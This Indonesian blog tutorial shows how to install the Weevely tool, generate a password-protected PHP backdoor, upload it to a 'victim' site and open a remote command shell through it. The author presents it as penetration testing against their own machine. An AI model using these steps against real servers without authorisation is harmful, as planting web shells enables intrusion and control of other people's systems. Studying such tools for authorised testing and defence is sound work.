Reverse Shell Menggunakan Weevely

Reverse Shell Menggunakan Weevely
 

Oke, Saya akan berbagi tutorial Penetration Testing lagi dengan menggunakan Tools Weevely. Tools ini memungkinkan kamu untuk mengakses server Victim dengan Command Line, sama halnya dengan Back Connect tapi dengan Weevely ini sedikit berbeda.

Nah sekarang untuk menggunakanya kamu bisa mengikuti perintah berikut :

$ git clone https://github.com/epinna/weevely3.git

Sekarang tunggu hingga proses clone selesai. Jika sudah selanjutnya kamu bisa mengetikan perintah berikut :

$ sudo apt-get install -y python3 python3-pip curl

Tunggu hingga proses installasi selesai, selanjutnya kamu bisa mengetikan perintah dibawah ini :

$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade

Setelah semuanya sudah siap, sekarang kita jalankan Weevely dengan perintah berikut :

$ python3 weevely.py

Jika sudah maka tampilan nya akan seperti ini :

Reverse Shell Menggunakan Weevely

Seperti pada gambar diatas ada keterangan bagaimana cara penggunaan nya, jadi pertama kamu harus meng-generate file backdoor yang nantinya bisa kamu upload ke situs  Victim. Nah saya akan menjadikan komputer saya sebagai Victim, sekarang kita bisa membuat backdoor dengan perintah berikut :

$ python3 weevely.py generate password /path/to/backdoor.php

Password nya sesuaikan dengan keinginan kamu dan path nya ini untuk menyimpan file backdoor nya mau dimana. Sebagai contoh saya akan menyimpan nya di folder ~/pentest/ untuk lebih jelas nya lihat gambar dibawah ini :

Reverse Shell Menggunakan Weevely

File backdoor sudah dibuat, sekarang kita upload ke situs Victim. Lihat gambar dibawah ini :

Reverse Shell Menggunakan Weevely

Jika sudah kita panggil file backdoor.php di terminal dengan menggunakan weevely, kamu bisa mengikuti perintah dibawah ini :

$ python3 weevely.py victim.com/uploads/backdoor.php password

Masukan url dari victim dan password yang sudah tadi kamu buat untuk meng-generate backdoor. Lihat gambar dibawah ini :

Reverse Shell Menggunakan Weevely

Nah sekarang kita sudah masuk ke server target, untuk mengetahui perintah apa saja yang bisa kita gunakan untuk menjalankan Weevely, kamu bisa mengetikan perintah :help, lihat gambar dibawah ini :

Reverse Shell Menggunakan Weevely

Untuk lebih lengkap nya kamu bisa cek sendiri. Sekarang saya akan coba untuk melakukan perintah touch untuk membuat file baru. Lihat gambar dibawah ini :

Reverse Shell Menggunakan Weevely

Oke semoga tutorial ini bermanfaat, ingat! jangan disalah gunakan ya :)

Belum ada Komentar untuk "Reverse Shell Menggunakan Weevely"

Posting Komentar

Iklan Atas

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel